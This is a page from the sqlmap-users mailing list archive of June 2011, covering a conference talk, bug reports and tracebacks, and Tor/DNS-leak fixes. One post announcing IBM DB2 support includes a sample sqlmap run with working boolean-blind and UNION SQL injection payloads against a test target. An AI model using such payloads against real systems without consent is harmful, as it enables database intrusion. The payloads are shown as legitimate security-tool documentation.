sqlmap-users Mailing List for sqlmap (Page 88)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Ahmed S. <ah...@is...> - 2011-06-26 14:25:40
|
congrats man, i have just read the whole slides and it rocks :) On Sun, Jun 26, 2011 at 4:07 PM, Bernardo Damele A. G. < ber...@gm...> wrote: > Slides from EuroPython presentation are online, http://t.co/wRPlSIf. > Soon to follow the video recording! > > Congratulations Miroslav! > > B. > > > On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: > > There's a reason why our grandparents used to dip their fingers in the > > whiskey glass when our parents were teething. > > Alcohol calms all. > > -- > > Kurt Grutzmacher -=- gr...@ji... > > > > > > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> it seems that i'll need to drink 2 beers before > >> > >> if you see me "probably" drunk you'll know i am :) > >> > >> kr > >> > >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> > wrote: > >> > /me gonna record it and spread it all of the interwebs :D > >> > > >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > >> > <mir...@gm...> wrote: > >> >> > >> >> ok people. > >> >> > >> >> this is my first conference and i am not the best narrator there is > in > >> >> the universe. > >> >> > >> >> i'll kill myself if it will be "streamed" :) > >> >> > >> >> kr > >> >> > >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > >> >> <chr...@gm...> wrote: > >> >> > If it is, be sure to point us in the right direction afterwards :) > >> >> > > >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > >> >> >> > >> >> >> will it be streamed live ? > >> >> >> > >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> >> >> <ber...@gm...> wrote: > >> >> >>> > >> >> >>> Hi, > >> >> >>> > >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at > EuroPython > >> >> >>> 2011 conference in Firenze, Italy. > >> >> >>> > >> >> >>> The talk is titled "sqlmap - security development in python". > >> >> >>> > >> >> >>> Abstract follows: > >> >> >>> """ > >> >> >>> The "sqlmap" is one of the largest, widely used and most active > >> >> >>> Python > >> >> >>> projects in the IT security community (more than 2000 commits in > >> >> >>> one > >> >> >>> year period with community of over 100 active testers). It > combines > >> >> >>> its developers' strong security knowledge together with > analytical, > >> >> >>> mathematical and Python development skills to provide IT > >> >> >>> professionals > >> >> >>> with vibrant features. > >> >> >>> > >> >> >>> Talk would be consisted of several parts: short introduction to > >> >> >>> project and developers, developing and testing environment, > >> >> >>> programming cycle, program's workflow, technologies used, common > >> >> >>> pitfalls and how we've circumvent them, usage of mathematical > >> >> >>> models, > >> >> >>> optimizations, project's future goals. > >> >> >>> > >> >> >>> The significant part of this talk would be the immediate insight > >> >> >>> into > >> >> >>> the developing process of probably the world's most advanced > >> >> >>> open-source Python IT security project today. > >> >> >>> """ > >> >> >>> > >> >> >>> Reference: > >> >> >>> > >> >> >>> > >> >> >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >> >> >>> > >> >> >>> Don't miss it if you are there, it will be a blast! :) > >> >> >>> > >> >> >>> Good luck Miroslav, > >> >> >>> Bernardo > >> >> >>> > >> >> >>> > >> >> >>> -- > >> >> >>> Bernardo Damele A. G. > >> >> >>> > >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >> >> >>> Mobile: +447788962949 (UK 07788962949) > >> >> >>> PGP Key ID: Unavailable > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > ------------------------------------------------------------------------------ > >> >> >>> Simplify data backup and recovery for your virtual environment > with > >> >> >>> vRanger. > >> >> >>> Installation's a snap, and flexible recovery options mean your > data > >> >> >>> is > >> >> >>> safe, > >> >> >>> secure and there when you need it. Data protection magic? > >> >> >>> Nope - It's vRanger. Get your free trial download today. > >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >>> _______________________________________________ > >> >> >>> sqlmap-users mailing list > >> >> >>> sql...@li... > >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> >> > >> >> >> > >> >> >> -- > >> >> >> > >> >> >> Ahmed Shawky El-Antry > >> >> >> Pen-tester, Programmer and System administrator > >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> >> Isecur1ty team member"http://www.isecur1ty.org" > >> >> >> Twitter @lnxg33k > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > ------------------------------------------------------------------------------ > >> >> >> Simplify data backup and recovery for your virtual environment > with > >> >> >> vRanger. > >> >> >> Installation's a snap, and flexible recovery options mean your > data > >> >> >> is > >> >> >> safe, > >> >> >> secure and there when you need it. Data protection magic? > >> >> >> Nope - It's vRanger. Get your free trial download today. > >> >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> _______________________________________________ > >> >> >> sqlmap-users mailing list > >> >> >> sql...@li... > >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > >> >> > > >> >> > > >> >> > > >> >> > > >> >> > > ------------------------------------------------------------------------------ > >> >> > Simplify data backup and recovery for your virtual environment with > >> >> > vRanger. > >> >> > Installation's a snap, and flexible recovery options mean your data > >> >> > is > >> >> > safe, > >> >> > secure and there when you need it. Data protection magic? > >> >> > Nope - It's vRanger. Get your free trial download today. > >> >> > http://p.sf.net/sfu/quest-sfdev2dev > >> >> > _______________________________________________ > >> >> > sqlmap-users mailing list > >> >> > sql...@li... > >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> > > >> >> > > >> >> > >> >> > >> >> > >> >> -- > >> >> Miroslav Stampar (@stamparm) > >> >> > >> >> E-mail: miroslav.stampar (at) gmail.com > >> >> PGP Key ID: 0xB5397B1B > >> > > >> > > >> > > >> > -- > >> > > >> > Ahmed Shawky El-Antry > >> > Pen-tester, Programmer and System administrator > >> > lnxg33k owner "http://lnxg33k.wordpress.com" > >> > Isecur1ty team member"http://www.isecur1ty.org" > >> > Twitter @lnxg33k > >> > > >> > >> > >> > >> -- > >> Miroslav Stampar (@stamparm) > >> > >> E-mail: miroslav.stampar (at) gmail.com > >> PGP Key ID: 0xB5397B1B > >> > >> > >> > ------------------------------------------------------------------------------ > >> Simplify data backup and recovery for your virtual environment with > >> vRanger. > >> Installation's a snap, and flexible recovery options mean your data is > >> safe, > >> secure and there when you need it. Data protection magic? > >> Nope - It's vRanger. Get your free trial download today. > >> http://p.sf.net/sfu/quest-sfdev2dev > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- - Ahmed Shawky El-Antry - Pen-tester, Programmer and System administrator - lnxg33k owner "http://lnxg33k.wordpress.com" - Isecur1ty team member"http://www.isecur1ty.org" - Twitter @lnxg33k |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-26 14:07:41
|
Slides from EuroPython presentation are online, http://t.co/wRPlSIf. Soon to follow the video recording! Congratulations Miroslav! B. On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: > There's a reason why our grandparents used to dip their fingers in the > whiskey glass when our parents were teething. > Alcohol calms all. > -- > Kurt Grutzmacher -=- gr...@ji... > > > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar > <mir...@gm...> wrote: >> >> it seems that i'll need to drink 2 beers before >> >> if you see me "probably" drunk you'll know i am :) >> >> kr >> >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> wrote: >> > /me gonna record it and spread it all of the interwebs :D >> > >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> >> >> ok people. >> >> >> >> this is my first conference and i am not the best narrator there is in >> >> the universe. >> >> >> >> i'll kill myself if it will be "streamed" :) >> >> >> >> kr >> >> >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley >> >> <chr...@gm...> wrote: >> >> > If it is, be sure to point us in the right direction afterwards :) >> >> > >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: >> >> >> >> >> >> will it be streamed live ? >> >> >> >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. >> >> >> <ber...@gm...> wrote: >> >> >>> >> >> >>> Hi, >> >> >>> >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at EuroPython >> >> >>> 2011 conference in Firenze, Italy. >> >> >>> >> >> >>> The talk is titled "sqlmap - security development in python". >> >> >>> >> >> >>> Abstract follows: >> >> >>> """ >> >> >>> The "sqlmap" is one of the largest, widely used and most active >> >> >>> Python >> >> >>> projects in the IT security community (more than 2000 commits in >> >> >>> one >> >> >>> year period with community of over 100 active testers). It combines >> >> >>> its developers' strong security knowledge together with analytical, >> >> >>> mathematical and Python development skills to provide IT >> >> >>> professionals >> >> >>> with vibrant features. >> >> >>> >> >> >>> Talk would be consisted of several parts: short introduction to >> >> >>> project and developers, developing and testing environment, >> >> >>> programming cycle, program's workflow, technologies used, common >> >> >>> pitfalls and how we've circumvent them, usage of mathematical >> >> >>> models, >> >> >>> optimizations, project's future goals. >> >> >>> >> >> >>> The significant part of this talk would be the immediate insight >> >> >>> into >> >> >>> the developing process of probably the world's most advanced >> >> >>> open-source Python IT security project today. >> >> >>> """ >> >> >>> >> >> >>> Reference: >> >> >>> >> >> >>> >> >> >>> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python. >> >> >>> >> >> >>> Don't miss it if you are there, it will be a blast! :) >> >> >>> >> >> >>> Good luck Miroslav, >> >> >>> Bernardo >> >> >>> >> >> >>> >> >> >>> -- >> >> >>> Bernardo Damele A. G. >> >> >>> >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >> >> >>> Mobile: +447788962949 (UK 07788962949) >> >> >>> PGP Key ID: Unavailable >> >> >>> >> >> >>> >> >> >>> >> >> >>> >> >> >>> ------------------------------------------------------------------------------ >> >> >>> Simplify data backup and recovery for your virtual environment with >> >> >>> vRanger. >> >> >>> Installation's a snap, and flexible recovery options mean your data >> >> >>> is >> >> >>> safe, >> >> >>> secure and there when you need it. Data protection magic? >> >> >>> Nope - It's vRanger. Get your free trial download today. >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev >> >> >>> _______________________________________________ >> >> >>> sqlmap-users mailing list >> >> >>> sql...@li... >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> >> >> >> >> >> >> >> -- >> >> >> >> >> >> Ahmed Shawky El-Antry >> >> >> Pen-tester, Programmer and System administrator >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" >> >> >> Isecur1ty team member"http://www.isecur1ty.org" >> >> >> Twitter @lnxg33k >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> >> Simplify data backup and recovery for your virtual environment with >> >> >> vRanger. >> >> >> Installation's a snap, and flexible recovery options mean your data >> >> >> is >> >> >> safe, >> >> >> secure and there when you need it. Data protection magic? >> >> >> Nope - It's vRanger. Get your free trial download today. >> >> >> http://p.sf.net/sfu/quest-sfdev2dev >> >> >> _______________________________________________ >> >> >> sqlmap-users mailing list >> >> >> sql...@li... >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> > >> >> > >> >> > >> >> > >> >> > ------------------------------------------------------------------------------ >> >> > Simplify data backup and recovery for your virtual environment with >> >> > vRanger. >> >> > Installation's a snap, and flexible recovery options mean your data >> >> > is >> >> > safe, >> >> > secure and there when you need it. Data protection magic? >> >> > Nope - It's vRanger. Get your free trial download today. >> >> > http://p.sf.net/sfu/quest-sfdev2dev >> >> > _______________________________________________ >> >> > sqlmap-users mailing list >> >> > sql...@li... >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > >> >> > >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar (@stamparm) >> >> >> >> E-mail: miroslav.stampar (at) gmail.com >> >> PGP Key ID: 0xB5397B1B >> > >> > >> > >> > -- >> > >> > Ahmed Shawky El-Antry >> > Pen-tester, Programmer and System administrator >> > lnxg33k owner "http://lnxg33k.wordpress.com" >> > Isecur1ty team member"http://www.isecur1ty.org" >> > Twitter @lnxg33k >> > >> >> >> >> -- >> Miroslav Stampar (@stamparm) >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> >> >> ------------------------------------------------------------------------------ >> Simplify data backup and recovery for your virtual environment with >> vRanger. >> Installation's a snap, and flexible recovery options mean your data is >> safe, >> secure and there when you need it. Data protection magic? >> Nope - It's vRanger. Get your free trial download today. >> http://p.sf.net/sfu/quest-sfdev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Miroslav S. <mir...@gm...> - 2011-06-26 10:44:15
|
hi Michael. to be honest we haven't heard that anyone have done it. maybe you could try it out :) kr On Sat, Jun 25, 2011 at 1:35 PM, Michael Bailey <mic...@gm...> wrote: > Has anybody managed to get SQLMap running on an android phone using SL4A? > > ------------------------------------------------------------------------------ > All the data continuously generated in your IT infrastructure contains a > definitive record of customers, application performance, security > threats, fraudulent activity and more. Splunk takes this data and makes > sense of it. Business sense. IT sense. Common sense.. > http://p.sf.net/sfu/splunk-d2d-c1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Michael B. <mic...@gm...> - 2011-06-25 11:35:12
|
Has anybody managed to get SQLMap running on an android phone using SL4A? |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-25 10:04:44
|
Hi,
The long awaited IBM DB2 support has been implemented in sqlmap. The
patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
and merged in sqlmap repository after some tweaking by us. It is very
stable for both DB2 8.x and 9.x branches.
The patch includes support to fingerprint and enumerate data on IBM
DB2 via boolean-based blind SQL injection and UNION query SQL
injection. Hopefully, soon someone will come up with a payload for
time-based and error-based techniques too. Support for direct
connection to the DBMS (-d switch) will be implemented soon as well.
Thank you Sebastian and the rest of the team at r-tec for your patch
and support!
Sample run against an IBM DB2 9.7 test environment:
--8<--
$ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program
[*] starting at 10:56:21
[10:56:21] [INFO] using
'/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session'
as session file
[10:56:21] [INFO] testing connection to the target url
[10:56:23] [INFO] heuristics detected web page charset 'ascii'
[10:56:23] [INFO] testing if the url is stable, wait a few seconds
[10:56:25] [INFO] url is stable
[10:56:25] [INFO] testing if GET parameter 'id' is dynamic
[10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
[10:56:26] [INFO] GET parameter 'id' is dynamic
[10:56:27] [INFO] heuristic test shows that GET parameter 'id' might
be injectable (possible DBMS: DB2)
[10:56:27] [INFO] testing sql injection on GET parameter 'id'
[10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind -
WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be DB2. Do
you want to skip test payloads specific for other DBMSes? [Y/n]
[10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
[10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) -
1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 21
HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
Type: UNION query
Title: Generic UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT
CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58)
FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
---
[10:58:58] [INFO] testing IBM DB2
[10:58:59] [INFO] confirming IBM DB2
[10:59:12] [INFO] the back-end DBMS is IBM DB2
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: active fingerprint: IBM DB2 9.7
html error message fingerprint: DB2
[10:59:12] [INFO] fetching banner
banner: 'DB2 v9.7.400.501'
[10:59:13] [INFO] fetching current user
current user: 'TEST'
--8<--
Bernardo
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
|
|
From: Alessandro T. <ale...@lo...> - 2011-06-25 08:59:05
|
On Jun 24, 2011, at 8:27 PM, Miroslav Stampar wrote: > hi all. > > just a minor status report about this whole mess i've caused. > > it seems that i was "plumbing" DNS leakage while the real cause was in > front of my eyes. so, with the last commit r4177 there shouldn't be > any DNS leakages (removed the original cause), together with broken > --proxy/--tor (caused by my plumbing) like in some reported cases Really good work. I was waiting for this fix ;) Cheers, Alessandro `jekil` Tanasi ale...@ta... |
|
From: Gianluca B. <g...@br...> - 2011-06-24 19:50:18
|
Thanks :) On Fri, Jun 24, 2011 at 9:19 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Gianluca. > > thank you for your report and find it fixed in the latest commit. > > kr > > On Fri, Jun 24, 2011 at 8:47 PM, Gianluca Brindisi <g...@br...> wrote: >> Sorry it's me again. >> (Look like somehow I am bringing bad luck :-| ) >> >> While trying the new crawl option I got an error: >> >> [20:35:30] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4177), >> retry your run with the latest development version from the Subversion >> repository. If the exception persists, >> please send by e-mail to sql...@li... the >> following text and any information required to reproduce the bug. The >> developers will try to reproduce the bug, fix >> it accordingly and get back to you. >> sqlmap version: 1.0-dev (r4177) >> Python version: 2.6.5 >> Operating system: posix >> Command line: sqlmap.py --tor -u XXXXXX --crawl 2 >> Technique: None >> Back-end DBMS: None (identified) >> Traceback (most recent call last): >> File "sqlmap.py", line 77, in main >> init(cmdLineOptions) >> File "/home/g/sqlmap-dev/lib/core/option.py", line 1831, in init >> __setCrawler() >> File "/home/g/sqlmap-dev/lib/core/option.py", line 420, in __setCrawler >> crawler.getTargetUrls() >> File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 106, in getTargetUrls >> runThreads(numThreads, crawlThread) >> File "/home/g/sqlmap-dev/lib/core/threads.py", line 97, in runThreads >> threadFunction() >> File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 58, in crawlThread >> content = Request.getPage(url=current, raise404=False)[0] >> File "/home/g/sqlmap-dev/lib/request/connect.py", line 199, in getPage >> url = "%s?%s" % (url, get) >> UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position >> 47: ordinal not in range(128) >> >> [*] shutting down at 20:35:30 >> >> Gianluca >> >> ------------------------------------------------------------------------------ >> All the data continuously generated in your IT infrastructure contains a >> definitive record of customers, application performance, security >> threats, fraudulent activity and more. Splunk takes this data and makes >> sense of it. Business sense. IT sense. Common sense.. >> http://p.sf.net/sfu/splunk-d2d-c1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > |
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 19:19:52
|
hi Gianluca. thank you for your report and find it fixed in the latest commit. kr On Fri, Jun 24, 2011 at 8:47 PM, Gianluca Brindisi <g...@br...> wrote: > Sorry it's me again. > (Look like somehow I am bringing bad luck :-| ) > > While trying the new crawl option I got an error: > > [20:35:30] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4177), > retry your run with the latest development version from the Subversion > repository. If the exception persists, > please send by e-mail to sql...@li... the > following text and any information required to reproduce the bug. The > developers will try to reproduce the bug, fix > it accordingly and get back to you. > sqlmap version: 1.0-dev (r4177) > Python version: 2.6.5 > Operating system: posix > Command line: sqlmap.py --tor -u XXXXXX --crawl 2 > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "sqlmap.py", line 77, in main > init(cmdLineOptions) > File "/home/g/sqlmap-dev/lib/core/option.py", line 1831, in init > __setCrawler() > File "/home/g/sqlmap-dev/lib/core/option.py", line 420, in __setCrawler > crawler.getTargetUrls() > File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 106, in getTargetUrls > runThreads(numThreads, crawlThread) > File "/home/g/sqlmap-dev/lib/core/threads.py", line 97, in runThreads > threadFunction() > File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 58, in crawlThread > content = Request.getPage(url=current, raise404=False)[0] > File "/home/g/sqlmap-dev/lib/request/connect.py", line 199, in getPage > url = "%s?%s" % (url, get) > UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position > 47: ordinal not in range(128) > > [*] shutting down at 20:35:30 > > Gianluca > > ------------------------------------------------------------------------------ > All the data continuously generated in your IT infrastructure contains a > definitive record of customers, application performance, security > threats, fraudulent activity and more. Splunk takes this data and makes > sense of it. Business sense. IT sense. Common sense.. > http://p.sf.net/sfu/splunk-d2d-c1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Gianluca B. <g...@br...> - 2011-06-24 18:48:02
|
Sorry it's me again.
(Look like somehow I am bringing bad luck :-| )
While trying the new crawl option I got an error:
[20:35:30] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4177),
retry your run with the latest development version from the Subversion
repository. If the exception persists,
please send by e-mail to sql...@li... the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix
it accordingly and get back to you.
sqlmap version: 1.0-dev (r4177)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --tor -u XXXXXX --crawl 2
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "sqlmap.py", line 77, in main
init(cmdLineOptions)
File "/home/g/sqlmap-dev/lib/core/option.py", line 1831, in init
__setCrawler()
File "/home/g/sqlmap-dev/lib/core/option.py", line 420, in __setCrawler
crawler.getTargetUrls()
File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 106, in getTargetUrls
runThreads(numThreads, crawlThread)
File "/home/g/sqlmap-dev/lib/core/threads.py", line 97, in runThreads
threadFunction()
File "/home/g/sqlmap-dev/lib/utils/crawler.py", line 58, in crawlThread
content = Request.getPage(url=current, raise404=False)[0]
File "/home/g/sqlmap-dev/lib/request/connect.py", line 199, in getPage
url = "%s?%s" % (url, get)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc2 in position
47: ordinal not in range(128)
[*] shutting down at 20:35:30
Gianluca
|
|
From: Miroslav S. <mir...@gm...> - 2011-06-24 18:36:06
|
lol. i attached the screenshot of original traffic (without --proxy) under before.jpg :) find the right caps attached. p.s. program was run by this command (some random open proxy out there): ./sqlmap.py -u "www.test.com" --proxy="http://74.63.212.147:3128" On Fri, Jun 24, 2011 at 8:27 PM, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > just a minor status report about this whole mess i've caused. > > it seems that i was "plumbing" DNS leakage while the real cause was in > front of my eyes. so, with the last commit r4177 there shouldn't be > any DNS leakages (removed the original cause), together with broken > --proxy/--tor (caused by my plumbing) like in some reported cases > > find the attached screenshots of Wireshark's run with original DNS > leakage (before.jpg) and with the latest commit (after.jpg). > > sorry, my fault. > > kr > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Gianluca B. <g...@br...> - 2011-06-24 18:35:28
|
Hi all, it's working great now (r4177). Thank you very much! Gianluca On Fri, Jun 24, 2011 at 7:43 PM, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Gianluca, > > Can you please verify that this is fixed now and report back? > > Thanks. > > Bernardo Damele A. G. > > This message was sent from a smartphone > > On 24 Jun 2011, at 18:25, Miroslav Stampar <mir...@gm...> wrote: > >> hi again. >> >> this should be hopefully fixed now for ever and ever. >> >> kr >> >> On Fri, Jun 24, 2011 at 5:14 PM, Miroslav Stampar >> <mir...@gm...> wrote: >>> Hi all. >>> >>> Relying from a train. >>> >>> There is a known reported issue related to the recent dns leakage fix and >>> --tor/--proxy. Will need to reproduce to be able to fix it. >>> >>> Kr >>> >>> Sent from smartphone >>> >>> On 24.6.2011. 17:06, "Gianluca Brindisi" <g...@br...> wrote: >>>> Mmm, I should be in r4168. >>>> But before the tests I have casted --update >>>> >>>> Anyway I've just checked out r4173 but still no luck: >>>> >>>> ./sqlmap.py --tor -u "http://www.google.it" >>>> >>>> sqlmap/1.0-dev (r4173) - automatic SQL injection and database takeover >>>> tool >>>> http://sqlmap.sourceforge.net >>>> >>>> [!] legal disclaimer: usage of sqlmap for attacking targets without >>>> prior mutual consent is illegal. It is the end user's responsibility >>>> to obey all applicable local, state and federal laws. Authors assume >>>> no liability and are not responsible for any misuse or damage caused >>>> by this program >>>> >>>> [*] starting at 16:57:50 >>>> >>>> [16:57:50] [WARNING] increasing default value for --time-sec to 10 >>>> because --tor switch was provided >>>> [16:57:50] [INFO] setting Tor proxy settings >>>> [16:57:51] [INFO] using '/*****/sqlmap/output/www.google.it/session' >>>> as session file >>>> [16:57:51] [INFO] testing connection to the target url >>>> [16:57:51] [CRITICAL] unable to connect to the target url or proxy, >>>> sqlmap is going to retry the request >>>> [16:57:51] [WARNING] if the problem persists please check that the >>>> provided target url is valid. If it is, you can try to rerun with the >>>> --random-agent switch turned on and/or proxy switches (--ignore-proxy, >>>> --proxy,...) >>>> [16:57:52] 